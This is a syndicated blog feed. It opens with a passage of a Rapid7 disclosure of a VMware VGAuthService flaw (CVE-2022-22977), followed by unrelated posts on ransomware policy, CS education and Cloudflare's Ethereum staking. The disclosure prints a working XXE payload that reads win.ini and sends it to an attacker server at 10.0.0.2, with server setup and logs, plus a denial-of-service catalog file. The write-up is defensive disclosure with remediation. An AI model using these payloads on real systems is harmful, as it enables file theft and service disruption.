<!DOCTYPE catalog PUBLIC "-//OASIS//DTD Entity Resolution XML Catalog V1.0//EN" "http://www.oasis-open.org/committees/entity/release/1.0/catalog.dtd">
<catalog xmlns="urn:oasis:names:tc:entity:xmlns:xml:catalog">
  <uri name="http://www.w3.org/TR/2002/REC-xmldsig-core-20020212/xmldsig-core-schema.xsd" uri="xmldsig-core-schema.xsd"/>
  <uri name="http://www.w3.org/TR/2002/REC-xmlenc-core-20021210/xenc-schema.xsd" uri="\\10.0.0.2\fdsa\xenc-schema.xsd"/>
</catalog>

Will simply prevent the service from ever running due to the malformed uri field. The VGAuthService log file in C:\ProgramData\VMware\VMware VGAuth\logfile.txt.0 will contain this line:

[2022-02-01T14:03:50.100Z] [ warning] [VGAuthService] XML Error: uri entry 'uri' broken ?: \\10.0.0.2\fdsa\xenc-schema.xsd

After the “malicious” file is created, the system must be rebooted (or the service restarted). Until this happens, some remote tooling for the VMware guest will not function properly.

File content exfiltration via XML external entity (XXE) attacks, and the limitations thereof

VGAuthService uses XML libraries (libxmlsec and libxml2) that have XML External Entity processing capabilities. Because the attacker controls various XML files parsed by the service, the attacker in theory can execute XXE injection and XXE out-of-band (OOB) attacks to leak files that a low-privileged user can’t read (e.g. C:\windows\win.ini).

It is true that these styles of attacks do work against VGAuthService.exe, but there is a severe limitation. Traditionally, an XXE OOB attack leaks the file of the attackers choosing via an HTTP or FTP uri. For example, “http://attackurl:80/endpoint?FILEDATA” where FILEDATA is the contents of the file. However, the XML library that VGAuthService.exe is using, libxml2, is very strict about properly formatted URI and any space character or newline will cause the exfiltration to fail. For example, let’s say we wanted to perform an XXE OOB attack and leak the contents of C:\Windows\win.ini. I’d create the following file at C:\Program%20Files\VMware\VMware%20Tools\etc\catalog

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://10.0.0.2/r7.dtd">
%sp;
%param1;
]>
<r>&exfil;</r>

And then we’d create the file r7.dtd on 10.0.0.2:

<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://10.0.0.2/xxe?%data;'>">

And server the r7.dtd file via a python server on 10.0.0.2:

albinolobster@ubuntu:~/oob$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Once the attack is triggered, VGAuthService.exe will make quite a few HTTP requests to the attackers HTTP server:

Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -

But notice that none of those HTTP requests contain the contents of win.ini. To see why, let’s take a look at VGAuthService’s log file.

[2022-02-01T14:34:00.528Z] [ warning] [VGAuthService] XML Error: parser 
[2022-02-01T14:34:00.528Z] [ warning] [VGAuthService] XML Error: error : 
[2022-02-01T14:34:00.528Z] [ warning] [VGAuthService] XML Error: Invalid URI: http:///10.0.0.2/xxe?; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

Here, we can see the contents of win.ini have been appended to http://10.0.0.2/xxe? and that has caused the XML library to error out due to an invalid URI. So we can’t leak win.ini over the network, but we were able to write it to VGAuthService’s log. Unfortunately (or fortunately, for defenders), the log file is only readable by administrative users, so leaking the contents of win.ini to the log file is no good for an attack.

An attacker can leak a file as long as it can be used to form a valid URI. I can think of one very specific case where ManageEngine has a “user” saved to file as “0:verylongpassword” where this could work. But that’s super specific. Either way, we can recreate this like so:

C:\>echo|set /p="helloworld" > r7.txt

C:\>type r7.txt
helloworld
C:\>

We then do the same attack as above, but instead of <!ENTITY % data SYSTEM "file:///c:/windows/win.ini"> we do <!ENTITY % data SYSTEM "file:///c:/r7.txt">

After executing the attack, we’ll see this on our HTTP server:

10.0.0.88 - - [01/Feb/2022 07:25:05] "GET /xxe?helloworld HTTP/1.0" 404 -

While this is technically a low-privileged user leaking a file, it is quite contrived, and honestly an unlikely scenario.

Another common XXE attack is leaking NTLM hashes, but libxml2 doesn’t honor UNC paths so that isn’t a possibility. So, in conclusion, the low-privileged attacker can only deny access to the service and, very occasionally, leak privileged files.

Remediation

VMware administrators who expect low-privileged, untrusted users to interact directly with the guest operating system should apply the patch at their convenience to avoid the denial-of-service condition. As stated above, the likelihood of anyone exploiting this vulnerability to exfiltrate secrets from the guest operating system is quite low, but if those circumstances apply to your environment, more urgency in patching is warranted.

In the absence of a patch, VMware administrators can create the missing directory with write permissions limited to administrators, and this should mitigate the issue entirely.

Disclosure timeline

  • February, 2022: Issue discovered by Jake Baines of Rapid7
  • Thu, Feb 24, 2022: Initial disclosure to [email protected]
  • Thu, Feb 24, 2022: Issue tracked as VSRC-10022.
  • Wed, Mar 02, 2022: Vendor asks for an extension beyond original April disclosure date
  • Mon, May 23, 2022: CVE-2022-22977 reserved by the vendor
  • Tue, May 24, 2022: This disclosure, as well as the vendor’s disclosure published

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Additional reading:

A Year on from the Ransomware Task Force Report

Post Syndicated from Jen Ellis original https://blog.rapid7.com/2022/05/24/a-year-on-from-the-ransomware-task-force-report/

A Year on from the Ransomware Task Force Report

If you follow cybersecurity, you’ve likely seen one of the many articles written recently on the one-year anniversary of the Colonial Pipeline ransomware attack, which saw fuel delivery suspended for six days, disrupting air and road travel across the southeastern states of the US. The Colonial attack was the biggest cyberattack against US critical infrastructure, making it something of a game-changer in the realm of ransomware, so it is absolutely worth noting the passage of time and investigating what’s changed since.

This blog will do that, but I’ll take a slightly different tack, as I’m also marking the anniversary of the Ransomware Task Force’s (RTF) report, which offered 48 recommendations for policymakers wanting to deter, disrupt, prepare, and respond to ransomware attacks. The report was issued a week prior to the Colonial attack.

Last week, I participated in an excellent event to mark the one-year anniversary of the RTF report. During the session, various ransomware experts discussed how the ransomware landscape has evolved over the past year, how government action has shaped this, and what more needs to be done. The Institute for Security and Technology (IST), which convenes and runs the RTF, has issued a paper capturing the points above. This blog offers my own thoughts on the matter, but it’s not at all exhaustive, and I recommend giving the official paper a read.

High-profile attacks raised the stakes

Looking back over the past year, in many ways, the Colonial attack – along with ransomware attacks on the Irish Health Service Executive (HSE) and JBS, the largest meat processing company in the world, all of which occurred during May 2021 – highlighted the exact concerns outlined in the RTF report. Specifically, the RTF had been convened based on the view that the high level of attacks against healthcare and other critical services through the pandemic made ransomware a matter of national security for those countries that are highly targeted.

In light of this, one of the most fundamental recommendations of the report was that this be acknowledged and met with a senior leadership and cross-governmental response. The Colonial attack resulted in President Biden addressing the issue of ransomware on national television. Subsequently, we have seen a huge cross-governmental focus on ransomware, with measures announced from departments including Homeland Security, Treasury, Justice, and State. We’ve also seen both Congress and the White House working on the issue. And while the US government has been the most vocal in its response, we have seen other governments also focusing on this issue as a priority and working together to amplify the impact of their action.

In June 2021, the Group of Seven (G7) governments of the world’s wealthiest democracies addressed ransomware at its annual summit. The resulting Communique capturing the group’s commitments includes pledges to work together to address the threat. In October 2021, the White House hosted the governments of 30 nations to discuss ransomware. The event launched the Counter Ransomware Initiative (CRI), committing to collaborate together to find solutions to reduce the ransomware threat. The CRI has identified key themes for further exploration and action, with a similar focus on deterring and disrupting attacks and driving adoption of greater cyber resilience.

Status of the RTF recommendations

This is all heartening to see and strongly aligns with the ethos and recommendations of the RTF recommendations. Drilling down into more of the details, there are many further areas of alignment, including the launch of coordinated awareness programs, introduction of sanctions, scrutiny of cryptocurrency regulations, and a focus on incident reporting regulations. The RTF paper provides a great deal more detail on these areas of alignment and the progress that has been made, as well as the areas that need more focus.

This, I believe, is the key point: A great deal of progress has been made, both in terms of building understanding of the problem and in developing alignment and collaboration among stakeholders, yet there is a great deal more work to be done. The partnerships between multiple governments — and between the public and private sectors — are hugely important for improving our odds against the attackers, but progress will not happen overnight. It will take time to see the real impact of the measures already taken, and there are yet measures to be determined, developed, and implemented.

Uncertain times

We must keep our eye on the ball and stay engaged, which is not easy when there are so many other demands on governments’ and business leaders’ limited time and resources. The Russia/Ukraine conflict has undoubtedly been a very time-consuming area of focus, though expectations that offensive cyber operations would be a key element of the Russian action have perhaps helped increase awareness of the need for cyber resilience. The economic downturn is another huge pressure and will almost certainly reduce critical infrastructure providers’ investments in cybersecurity as the cost of business increases in other areas, resulting in budget cuts. While both of these developments may distract governments and business leaders from ransomware, they may also increase ransomware activity as economic deprivation and job scarcity encourage more people to turn to cybercrime to make a living.

According to law enforcement and other government agencies, as well as the cyber insurance sector, the reports of ransomware incidents are slowing down or declining. Due to a long-standing lack of consistent incident reporting, it’s hard to contextualize this, and while we very much hope it points to a reduction in attacks, we can’t say that that’s the case. Security researchers report that activity on the dark web seems to be continuing at pace with 2021, a record year for ransomware attacks. It’s possible that the shift in view from law enforcement could be due to fears that involving them will result in regulatory repercussions; reports to insurers could be down due to the introduction of more stringent requirements for claims.

The point is that it’s too early to tell, which is why we need to maintain a focus on the issue and seek out data points and anecdotal evidence to help us understand the impact of the government action taken so far, so we can continue to explore and adjust our approach. An ongoing focus, continued collaboration, and more data will help ensure we put as much pressure as possible on ransomware actors and the governments and systems that allow them to flourish. Over time, this is how we will make progress to reduce the ransomware threat.

Additional reading:

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

A teaspoon of computing in every subject: Broadening participation in computer science

Post Syndicated from Sue Sentance original https://www.raspberrypi.org/blog/guzdial-teaspoon-computing-tsp-language-broadening-participation-school/

From May to November 2022, our seminars focus on the theme of cross-disciplinary computing. Through this seminar series, we want to explore the intersections and interactions of computing with all aspects of learning and life, and think about how they can help us teach young people. We were delighted to welcome Prof. Mark Guzdial (University of Michigan) as our first speaker.

Mark Guzdial.
Professor Mark Guzdial, University of Michigan

Mark has worked in computer science (CS) education for decades and won many awards for his research, including the prestigious ACM SIGCSE Outstanding Contribution to Computing Education award in 2019. He has written literally hundreds of papers about CS education, and he authors an extremely popular computing education research blog that keeps us all up to date with what is going on in the field.

Young learners at computers in a classroom.

In his talk, Mark focused on his recent work around developing task-specific programming (TSP) languages, with which teachers can add a teaspoon (also abbreviated TSP) of programming to a wide variety of subject areas in schools. Mark’s overarching thesis is that if we want everyone to have some exposure to CS, then we need to integrate it into a range of subjects across the school curriculum. And he explained that this idea of “adding a teaspoon” embraces some core principles; for TSP languages to be successful, they need to:

  • Meet the teachers’ needs
  • Be relevant to the context or lesson in which it appears
  • Be technically easy to get to grips with

Mark neatly summarised this as ‘being both usable and useful’. 

Historical views on why we should all learn computer science

We can learn a lot from going back in time and reflecting on the history of computing. Mark started his talk by sharing the views of some of the eminent computer scientists of the early days of the subject. C. P. Snow maintained, way back in 1961, that all students should study CS, because it was too important to be left to a small handful of people.

A quote by computer scientist C. S. Snow from 1961: A handful of people, having no relation to the will of society, having no communication with the rest of society, will be taking decisions in secret which are going to affect our lives in the deepest, sense.

Alan Perlis, also in 1961, argued that everyone at university should study one course in CS rather than a topic such as calculus. His reason was that CS is about process, and thus gives students tools that they can use to change the world around them. I’d never heard of this work from the 1960s before, and it suggests incredible foresight. Perhaps we don’t need to even have the debate of whether computer science is for everyone — it seems it always was!

What’s the problem with the current situation?

In many of our seminars over the last two years, we have heard about the need to broaden participation in computing in school. Although in England, computing is mandatory for ages 5 to 16 (in theory, in practice it’s offered to all children from age 5 to 14), other countries don’t have any computing for younger children. And once computing becomes optional, numbers drop, wherever you are.

""
Not enough students are experiencing computer science in school.

Mark shared with us that in US high schools, only 4.7% of students are enrolled in a CS course. However, students are studying other subjects, which brought him to the conclusion that CS should be introduced where the students already are. For example, Mark described that, at the Advanced Placement (AP) level in the US, many more students choose to take history than CS (399,000 vs 114,000) and the History AP cohort has more even gender balance, and a higher proportion of Black and Hispanic students. 

The teaspoon approach to broadening participation

A solution to low uptake of CS being proposed by Mark and his colleagues is to add a little computing to other subjects, and in his talk he gave us some examples from history and mathematics, both subjects taken by a high proportion of US students. His focus is on high school, meaning learners aged 14 and upwards (upper secondary in Europe, or key stage 4 and 5 in England). To introduce a teaspoon of CS to other subjects, Mark’s research group builds tools using a participatory design approach; his group collaborates with teachers in schools to identify the needs of the teachers and students and design and iterate TSP languages in conjunction with them.

Three teenage boys do coding at a shared computer during a computer science lesson.

Mark demonstrated a number of TSP language prototypes his group has been building for use in particular contexts. The prototypes seem like simple apps, but can be classified as languages because they specify a process for a computational agent to execute. These small languages are designed to be used at a specific point in the lesson and should be learnable in ten minutes. For example, students can use a small ‘app’ specific to their topic, look at a script that generates a visualisation, and change some variables to find out how they impact the output. Students may also be able to access some program code, edit it, and see the impact of their edits. In this way, they discover through practical examples the way computer programs work, and how they can use CS principles to help build an understanding of the subject area they are currently studying. If the language is never used again, the learning cost was low enough that it was worth the value of adding computation to the one lesson.

We have recorded the seminar and will be sharing the video very soon, so bookmark this page.

Try TSP languages yourself

You can try out the TSP language prototypes Mark shared yourself, which will give you a good idea of how much a teaspoon is!

DV4L: For history students, the team and participating teachers have created a prototype called DV4L, which visualises historical data. The default example script shows population growth in Africa. Students can change some of the variables in the script to explore data related to other countries and other historical periods.

Pixel Equations: Mathematics and engineering students can use the Pixel Equations tool to learn about the way that pictures are made up of individual pixels. This can be introduced into lessons using a variety of contexts. One example lesson activity looks at images in the contexts of maps. This prototype is available in English and Spanish. 

Counting Sheets: Another example given by Mark was Counting Sheets, an interactive tool to support the exploration of counting problems, such as how many possible patterns can come from flipping three coins. 

Have a go yourself. What subjects could you imagine adding a teaspoon of computing to?

Join our next free research seminar

We’d love you to join us for the next seminar in our series on cross-disciplinary computing. On 7 June, we will hear from Pratim Sengupta, of the University of Calgary, Canada. He has conducted studies in science classrooms and non-formal learning environments, focusing on providing open and engaging experiences for anyone to explore code. Pratim will share his thoughts on the ways that more of us can become involved with code when we open up its richness and depth to a wider audience. He will also introduce us to his ideas about countering technocentrism, a key focus of his new book.

And finally… save another date!

We will shortly be sharing details about the official in-person launch event of the Raspberry Pi Computing Education Research Centre at the University of Cambridge on 20 July 2022. And guess who is going to be coming to Cambridge, UK, from Michigan to officially cut the ribbon for us? That’s right, Mark Guzdial. More information coming soon on how you can sign up to join us for free at this launch event.

The post A teaspoon of computing in every subject: Broadening participation in computer science appeared first on Raspberry Pi.

Proof of Stake and our next experiments in web3

Post Syndicated from Wesley Evans original https://blog.cloudflare.com/next-gen-web3-network/

Proof of Stake and our next experiments in web3

Proof of Stake and our next experiments in web3

A little under four years ago we announced Cloudflare’s first experiments in web3 with our gateway to the InterPlanetary File System (IPFS). Three years ago we announced our experimental Ethereum Gateway. At Cloudflare, we often take experimental bets on the future of the Internet to help new technologies gain maturity and stability and for us to gain deep understanding of them.

Four years after our initial experiments in web3, it’s time to launch our next series of experiments to help advance the state of the art. These experiments are focused on finding new ways to help solve the scale and environmental challenges that face blockchain technologies today. Over the last two years there has been a rapid increase in the use of the underlying technologies that power web3. This growth has been a catalyst for a generation of startups; and yet it has also had negative externalities.

At Cloudflare, we are committed to helping to build a better Internet. That commitment balances technology and impact. The impact of certain older blockchain technologies on the environment has been challenging. The Proof of Work (PoW) consensus systems that secure many blockchains were instrumental in the bootstrapping of the web3 ecosystem. However, these systems do not scale well with the usage rates we see today. Proof of Work networks rely on complex cryptographic functions to create consensus and prevent attacks. Every node on the network is in a race to find a solution to this cryptographic problem. This cryptographic function is called a hash function. A hash function takes a number in x, and gives a number out y. If you know x, it’s easy to compute y. However, given y, it’s prohibitively costly to find a matching x. Miners have to find an x that would output a y with certain properties, such as 10 leading zero. Even with advanced chips, this is costly and heavily based on chance.

Proof of Stake and our next experiments in web3

While that process is incredibly secure because of the vast amount of hashing that occurs, Proof of Work networks are wasteful. This waste is driven by the fact that Proof of Work consensus mechanisms are electricity-intensive. In a PoW ecosystem, energy consumption scales directly with usage. So, for example, when web3 took off in 2020, the Bitcoin network started to consume the same amount of electricity as Switzerland (according to Cambridge Bitcoin Electricity Consumption Index).

This inefficiency in resource use is by design to make it difficult for any single actor to threaten the security of the blockchain, and for the majority of the last decade, while use was low, this inefficiency was an acceptable trade off. The other major trade off accepted with the security of Proof of Work has been the number of transactions the network can handle per second. For instance, the Ethereum network can currently process about 30 transactions per second. This ultra-low transaction rate was acceptable when the technology was in development, but does not scale to meet the current demand.

As recently as two years ago, web3 was an up-and-coming ecosystem with minimal traffic compared to the majority of the traffic on the Internet. The last two years changed the web3 use landscape. Traffic to the Bitcoin and the Ethereum networks has exploded. Technologies like Smart Contracts that power DeFi, NFTs, and DAOs have started to become commonplace in the developer community (and in the Twitter lexicon). The next generation of blockchains like Flow, Avalanche, Solana, as well as Polygon are being developed and adopted by major companies like Meta.

In order to balance our commitment to the environment and to help build a better Internet, it is clear to us that we should launch new experiments to help find a path forward. A path that balances the clear need to drastically reduce the energy consumption of web3 technologies and the capability to scale the web3 networks by orders of magnitude if the need arises to support increased user adoption over the next five years. How do we do that? We believe that the next generation of consensus protocols is likely to be based on Proof of Stake and Proof of Spacetime consensus mechanisms.

Proof of Stake and our next experiments in web3

Today, we are excited to announce the start of our experiments for the next generation of web3 networks that are embracing Proof of Stake; beginning with Ethereum. Over the next few months, Cloudflare will launch, and fully stake, Ethereum validator nodes on the Cloudflare global network as the community approaches its transition from Proof of Work to Proof of Stake with “The Merge.” These nodes will serve as a testing ground for research on energy efficiency, consistency management, and network speed.

There is a lot in that paragraph so let’s break it down! The short version though is that Cloudflare is going to participate in the research and development of the core infrastructure that helps keep Ethereum secure, fast, as well as energy efficient for everyone.

Proof of Stake is a next-generation consensus protocol to secure blockchains. Unlike Proof of Work that relies on miners racing each other with increasingly complex cryptography to mine a block, Proof of Stake secures new transactions to the network through self-interest. Validator’s nodes (people who verify new blocks for the chain) are required to put a significant asset up as collateral in a smart contract to prove that they will act in good faith. For instance, for Ethereum that is 32 ETH. Validator nodes that follow the network’s rules earn rewards; validators that violate the rules will have portions of their stake taken away. Anyone can operate a validator node as long as they meet the stake requirement. This is key. Proof of Stake networks require lots and lots of validators nodes to validate and attest to new transactions. The more participants there are in the network, the harder it is for bad actors to launch a 51% attack to compromise the security of the blockchain.

To add new blocks to the Ethereum chain, once it shifts to Proof of Stake, validators are chosen at random to create new blocks (validate). Once they have a new block ready it is submitted to a committee of 128 other validators who act as attestors. They verify that the transactions included in the block are legitimate and that the block is not malicious. If the block is found to be valid, it is this attestation that is added to the blockchain. Critically, the validation and attestation process is not computationally complex. This reduction in complexity leads to significant energy efficiency improvements.

The energy required to operate a Proof of Stake validator node is magnitudes less than a Proof of Work miner. Early estimates from the Ethereum Foundation estimate that the entire Ethereum network could use as little as 2.6 megawatts of power. Put another way, Ethereum will use 99.5% less energy post merge than today.

We are going to support the development and deployment of Ethereum by running Proof of Stake validator nodes on our network. For the Ethereum ecosystem, running validator nodes on our network allows us to offer even more geographic decentralization in places like EMEA, LATAM, and APJC while also adding infrastructure decentralization to the network. This helps keep the network secure, outage resistant, and closer to the goal of global decentralization for everyone. For us, It’s a commitment to helping research and experiment with scaling the next generation of blockchain networks that could be a key part of the story of the Internet. Running blockchain technology at scale is incredibly difficult, and Proof of Stake systems have their own unique requirements that will take time to understand and improve. Part of this experimentation though is a commitment. As part of our experiments Cloudflare has not and will not run our own Proof of Work infrastructure on our network.

Finally, what is “The Merge”? The Merge is the planned combination of the Ethereum Mainnet (the chain you interact with today when you make an Eth transaction) and the Ethereum Beacon Chain. The Beacon chain is the Proof of Stake blockchain running in parallel with the Ethereum Mainnet. The Merge is much more significant than a consensus update.

Consensus updates have happened multiple times already on Ethereum. This could be because of a vulnerability, or the need to introduce new features. The Merge is different in a way that it cannot be made by a normal upgrade. Previous forks have been enabled at a specific block number. This means that if you mine enough blocks, the new consensus rules apply automatically. With the Merge, there should only be one state root for the fork to happen. The merge state root would be the start of the Ethereum Mainnet PoS journey. It is chosen and set at a certain difficulty, instead of block height, to avoid merging a high block with low difficulty.

Once The Merge occurs later this year in 2022, Ethereum will be a full Proof of Stake ecosystem that no longer relies on Proof of Work.

This is just the start of our commitment to help build the next generation of web3 networks. We are excited to work with our partners across the cryptography, web3, and infrastructure communities to help create the next generation of blockchain ecosystems that are environmentally sustainable, secure, and blazing fast.